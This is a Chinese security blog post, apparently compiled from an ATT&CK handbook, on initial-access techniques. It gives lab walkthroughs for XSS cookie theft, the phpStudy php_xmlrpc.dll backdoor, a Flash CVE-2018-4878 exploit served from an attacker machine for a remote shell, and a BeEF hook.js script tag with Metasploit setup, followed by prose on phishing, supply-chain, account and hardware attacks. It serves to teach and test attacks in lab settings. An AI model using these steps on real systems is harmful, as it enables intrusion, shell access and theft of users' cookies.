技术干货 | ATT&ck 入口点攻击方式

ATT&ck 入口点 —— 水坑攻击

分析并了解目标的上网活动规律，寻找目标经常访问的网站的漏洞，利用 漏洞在该网站植入恶意代码（陷阱、水坑），在目标进行访问时，攻击形 成。多种可能被植入的代码，包括：

· 1. 通过注入某些形式的恶意代码。例如：JavaScript、iframe、跨站脚本 等

· 2. 植入恶意的广告链接

· 3. 内置的 Web 应用程序接口用于插入任何其他类型的对象，该对象可用 于显示 Web 内容或包含在访问客户端上执行的脚本（例如，论坛帖 子，评论和其他用户可控制的 Web 内容）

· 4. 重定向用户所经常访问的站点到恶意站点

地址：https://blog.51cto.com/tdcqvip/2105099

环境：使用xss测试平台【https://xsshs.cn/xss.php?do=project&act=view&id=43573】

           靶机pikachu

过程

1、打开靶机平台，输入XSS测试平台的代码

2、查看可以使用的代码xss

3、运行结果后查看获取cookie 

概述

后门代码存在于/ext/php_xmlrpc.dll模块中，用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否存在后门；递归检测当前目录下的dll文件中是否有相应字符；

*程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门

条件

• · php.ini中必须要引用该模块，这样才能去复现该漏洞，若开启了xmlrpc功能，php就会加载这个php_xmlrpc.dll动态链接库文件，其中的恶意代码就会被触发。

• · xml rpc是使用http协议做为传输协议的rpc机制（远程过程调用），使用xml文本的方式传输命令和数据。

有问题的文件

· PhpstudyPHPTutorialphpphp-5.2.17extphp_xmlrpc.dll

· PhpstudyPHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

· PhpstudyPHPTutorialphpphp-5.4.45-ntsextphp_xmlrpc.dll

影响

 phpstudy 2016（php5.4/5.2） phpstudy 2018（php5.4/5.2）

附EXP：

https://github.com/Any3ite/phpstudy_backdoor

https://github.com/topics/phpstudybackdoor

过程

该后门利用比较简单，仅需提交两个参数
Accept-Encoding: gzip,deflate
Accept-Charset: Base64编码(PHP代码)

攻击者：Windows 10系统
靶机：    Windows 7虚拟机+phpstudy2016

找到php_xmlrpc.dll文件查找是否存在eval函数内容

GET请求方式；在Accept-Encoding中，deflate的前面都有一个空格，这个空格导致重访无法成功，去掉空格即可

地址：https://www.4hou.com/posts/p7Op

地址：https://github.com/r00tSe7en/Flash-Pop

https://github.com/wrlu/Vulnerabilities/blob/master/CVE-2018-4878/cve-2018-4878.py

环境：kali【192.168.245.128 】 和 win7【192.168.245.129 】

漏洞概述

2018年2月1号，Adobe官方发布安全通报（APSA18-01），声明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。

攻击者通过构造特殊的Flash链接，当用户用浏览器/邮件/Office访问此Flash链接时，会被“远程代码执行”，并且直接被getshell; 直到2018年2月5号，Adboe才发布补丁来修复此0 day漏洞。

过程

攻击机：Linux kali

靶机：Windows7 （安装26版本的flash）

　　1、Linux 下载cve-2018-4878文件包

　　2、利用msfvenom生成shell代码

进入cve-2018-4878中将cve-2018-4878.py的内容替换为生成的shell代码并且修改最下面的文件存放路径

3、cd 进入CVE-2018-4878目录使用python命令编译文件

移动.html和.swf两个文件到apache中：
　　　　cp index.html /var/www/html/index.html

　　　　cp exploit.swf /var/www/html/exploit.swf

启动metasploit：

靶机访问构造好的网站http://攻击机IP/index.html 即可获取shell

Kali linux 系统默认未安装beef，需要自行安装

1apt-get update

2apt-get install beef-xss

启动/usr/share/beef-xss

1cd /usr/share/beef-xss

2./beef

账号密码

127.0.0.1：3000/ui/pannel

beef/beef

嵌入代码

<script src="Ip:3000/hook.js">

与Metasploit联动

Beef配置文件

/usr/share/beef-xss/config.yaml  

1 metasploit:

2 enable: false

改成

1 metasploit:

2 enable: true

vim /usr/share/beef-xss/extensions/metasploit/config.yaml

原：

1 {os: 'custom', path: ''}

修改成

1{os: 'custom', path: '/usr/share/metasploit-framework/'}

修改 host callback_host两参数，改为beef主机IP

重启postgresq、metasploit、服务

1service postgresql restart & service metasploit restart 

msfconsole #启动Metasploit    

MSFload msgrpc ServerHost=IP Pass=abc123

MSF设置：

use exploit/windows/browser/ie_execcommand_uaf

show options

set srvhost IP

exploit/run

测试：win7 x64与kali

参考链接

ATT&CK手册.pdf

ATT&ck 入口点 —— 其他攻击

利用软件、数据库、中间件、第三方库或存在漏洞的库等公开的漏洞，对目标系统进行攻击，以达到攻击未及时修补或升级的信息系统。

公开漏洞来源：

1. CVE、CNVD、CNNVD、exploit-db 等漏洞库

2. qq 群、推特、社区、论坛等社交平台、公众号

3. github、码云

       VPN，Citrix 等远程服务和其他访问机制允许用户从外部位置连接到内部 企业网络资源。通常有远程服务网关来管理这些服务的连接和凭证身份验 证。Windows 远程管理等服务也可以在外部使用。通常需要访问有效帐 户来使用该服务，这可以通过凭证嫁接或在危及企业网络后从用户处获得 凭证来实现。在操作期间，可以将对远程服务的访问用作冗余访问的一部 分。

    远程服务：VPN、Citrix、SSH、Windows 远程桌面、TeamViewer、 EasyConnect 等

       如果命令和控制网络是有线因特网连接，则可以例如通过 WiFi 连接，调 制解调器，蜂窝数据连接，蓝牙或其他射频（RF）信道进行泄漏。如果 攻击者具有足够的访问权限或接近度，则攻击者可以选择执行此操作，并且可能无法保护或保护连接以及主要的 Internet 连接通道，因为它不通 过同一企业网络路由。

       计算机附件，计算机或网络硬件可以作为矢量引入系统以获得执行。虽然 APT 组使用的公开参考很少，但许多渗透测试人员利用硬件添加进行初始访问。商业和开源产品的功能包括被动网络窃听，打破中间人加密，击 键注入，通过 DMA 读取内核内存，增加新的无线接入现有网络等。

       可添加的硬件：U 盘、鼠标、键盘、硬盘、智能设备、摄像头、打印机、USB 数据线、Pineapple 等

1、通过一根数据线控制你的苹果电脑 一根经过特殊定制的苹果手机充电器，使用它连接苹果电脑后，可以通过植入 木马，远程操控电脑。

参考链接：https://mp.weixin.qq.com/s/bnbODlzMn7_vCgWyfm4Rsg DemonSeed

恶 意 USB 数据线：https://github.com/O-MG/DemonSeed

       通过将恶意软件复制到可移动媒体并在将媒体插入系统并执行时利用自动 运行功能，攻击者可能会移动到系统上，可能是那些在断开连接或气隙网 络上的系统。在横向移动的情况下，这可能通过修改存储在可移动媒体上 的可执行文件或通过复制恶意软件并将其重命名为合法文件来欺骗用户在 单独的系统上执行它来实现。

      在初始访问的情况下，这可以通过手动操纵 媒体，修改用于初始格式化媒体的系统或修改媒体固件本身来实现。

      可移动媒体：BadUSB、光碟等

      鱼叉式钓鱼附件是鱼叉式钓鱼的一种特殊变体。

      鱼叉式钓鱼附件不同于其 他形式的鱼叉式钓鱼，因为它发送带有有恶意软件的附件。所有形式的鱼 叉式网络钓鱼都是以电子邮件的方式提供针对特定个人，公司或行业的社 会工程。在这种情况下，攻击者会将文件附加到鱼叉式网络钓鱼电子邮件 中，并且通常依靠用户执行来获取执行权。

      附件有许多选项，例如 Microsoft Office 文档，可执行文件，PDF 或存 档文件。打开附件后，攻击者的有效负载会利用漏洞或直接在用户的系统 上执行。鱼叉式网络钓鱼电子邮件的文本通常试图给出一个合理的理由， 说明为什么要打开文件，并且可以解释如何绕过系统保护以便这样做。该 电子邮件还可能包含有关如何解密附件的说明，例如 zip 文件密码，以逃 避电子邮件边界防御。

      攻击者经常操纵文件扩展名和图标，以使附加的可 执行文件看起来像是文档文件，或者利用一个应用程序的文件看起来是另 一个应用程序的文件。

       带链接的鱼叉式网页钓鱼是鱼叉式网页钓鱼的一种特殊变种。

      它与其他形 式的鱼叉式网络钓鱼不同之处在于它使用链接来下载电子邮件中包含的恶 意软件，而不是将恶意文件附加到电子邮件本身，以避免可能检查电子邮 件附件的防御。所有形式的鱼叉式网络钓鱼都是以电子方式提供的针对特定个人，公司或 行业的社会工程。在这种情况下，恶意电子邮件包含链接。通常，链接将 伴随社会工程文本，并要求用户主动点击或复制并将 URL 粘贴到浏览器 中，从而利用用户执行。

      被访问的网站可能使用漏洞攻击来破坏 Web 浏 览器，或者用户会被提示下载应用程序、文档、zip 文件，甚至是可执行 文件，这首先取决于电子邮件的借口。

      攻击者还可以包括旨在与电子邮件 阅读器直接交互的链接，包括旨在直接利用终端系统的嵌入式图像或验证 电子邮件的接收（即网络错误/网络信标）。

      通过服务进行的鱼叉式网络钓鱼是鱼叉式钓鱼的一种特殊变种。

      它与其他 形式的鱼叉式网络钓鱼不同之处在于它使用第三方服务而不是直接通过企 业电子邮件渠道。所有形式的鱼叉式网络钓鱼都是以电子方式提供的针对特定个人，公司或 行业的社会工程。在这种情况下，攻击者通过各种社交媒体服务，个人网 络邮件和其他非企业控制的服务发送消息。与企业相比，这些服务更可能 具有不太严格的安全策略。与大多数类型的鱼叉式网络钓鱼一样，所发送 的服务是与目标产生融洽关系，或以某种方式获得目标的兴趣。攻击者会 创建虚假的社交媒体帐户，并向员工发送潜在工作机会的信息。这样做可 以提供一个合理的理由来询问在环境中运行的服务、策略和软件。然后， 攻击者可以通过这些服务发送恶意链接或附件。

      一个常见的例子是通过 社交媒体与目标建立融洽关系，然后将内容发送到目标在其工作计算机上 使用的个人网络邮件服务。这允许攻击者绕过对工作帐户的某些电子邮件 限制，并且目标更有可能打开文件，因为内容是他们期望的东西。如果有 效负载不能按预期工作，则攻击者可以继续正常通信，并与目标进行故障 排除，了解如何使其正常工作。

       供应链妥协是指最终消费者在收到数据或系统损害之前对产品或产品交付 机制的操纵。

       供应链的妥协可以在供应链的任何阶段进行，包括：– 操纵开发工具 – 操纵开发环境 – 操作源代码存储库（公共或私有） – 在开源依赖中操作源代码 – 操纵软件更新/分发机制 – 受损/受感染的系统映像（工厂感染的多个可移动介质案例） – 用修改版本替换合法软件 – 向合法分销商销售改装/假冒产品 – 装运拦截 虽然供应链妥协可能会影响硬件或软件的任何组件，但寻求获得执行的攻 击者通常会专注于在软件分发或更新渠道中对合法软件的恶意添加。定位 可能特定于所需的受害者集，或者恶意软件可能会分发给广泛的消费者， 但只会针对特定受害者采取其他策略。在许多应用程序中用作依赖项的流 行开源项目也可能成为向依赖项用户添加恶意代码的手段。

      攻击者可能会破坏或以其他方式利用能够接触到目标受害者的组织。

      通过 可信的第三方关系访问利用现有的连接，与访问网络的标准机制相比，该 连接可能不受保护，或者受到的审查较少。组织经常授予第二或第三方外部提供者更高的访问权限，以便允许他们管 理内部系统。这些关系的一些例子包括 IT 服务承包商、托管安全供应 商、基础设施承包商(例如 HVAC、电梯、物理安全)。

      第三方提供者的访 问可能仅限于正在维护的基础设施，但可能与企业的其他部分存在于同一 网络上。

      因此，另一方用于访问内部网络系统的有效帐户可能被破坏和使 用。

      攻击者可以使用凭据访问技术窃取特定用户或服务帐户的凭据，或者通过 社会工程在其侦察过程中更早地捕获凭据，以获得初始访问权。

      攻击者可能使用的帐户可以分为三类:默认帐户、本地帐户和域帐户。默 认帐户是那些内置到操作系统中的帐户，比如 Windows 系统上的访客或 管理员帐户，或者其他类型的系统、软件或设备上的默认工厂/供应商帐 户。

      本地帐户是由组织为用户、远程支持、服务或单个系统或服务上的管 理而配置的帐户。

      域帐户是由 Active Directory 域服务管理的，其中访问 和权限是跨属于该域的系统和服务配置的。域帐户可以覆盖用户、管理员 和服务。受危害的凭据可以用来绕过对网络内系统上各种资源的访问控制，甚至可 以用于对远程系统和外部可用服务(如 VPNs、Outlook Web access 和远 程桌面)的持久访问。受损害的凭据还可能授予攻击者对特定系统或访问 网络的受限区域的更多特权。攻击者可能会选择不使用恶意软件或工具， 使用这些证书提供的合法访问权限，从而使检测它们的存在变得更加困 难。缺省帐户也不限于客户机上的客户机和管理员，它们还包括为网络设备和 计算机应用程序等设备预先设置的帐户，无论这些设备是内部的、开放源 码的还是 COTS 的。

      预置用户名和密码组合的设备对安装后不更改 it 的 组织构成严重威胁，因为它们很容易成为攻击者的目标。类似地，攻击者 也可以利用公开公开的私钥，或偷来的私钥，通过远程服务合法地连接到 远程环境 帐户访问、凭据和跨系统网络的权限的重叠是值得关注的，因为攻击者可 能能够跨帐户和系统进行切换，以达到较高的访问级别(即，以绕过在企 业内设置的访问控制。

      通过利用近距离通讯来进行攻击。利用目标存在的近距离通讯，例如 WIFI，WiFi 安全标标准中常用的加密算法如 WEP、WPA/WPA2、 WPA-PSK/WPA2-PSK 等都存在问题，易被窃听，且容易泄露用户系统 信息和 PSK 等重要安全信息，认证机制相对简单，易被各种方式主动攻 击，得益与这些弱点，WIFI 攻击变得容易。对近距离通讯进行中继攻击。

      攻击方式：WIFI、蓝牙、ZigBee、NFC、RFID 等。

      通过 fuzz 所有可能 fuzz 的目标，寻找未知漏洞，利用未知漏洞进行攻 击。

可攻击点：

1. web 网站

2. 服务器

3. 协议 fuzz

4. 硬件 fuzz

参考链接

ATT&CK手册.pdf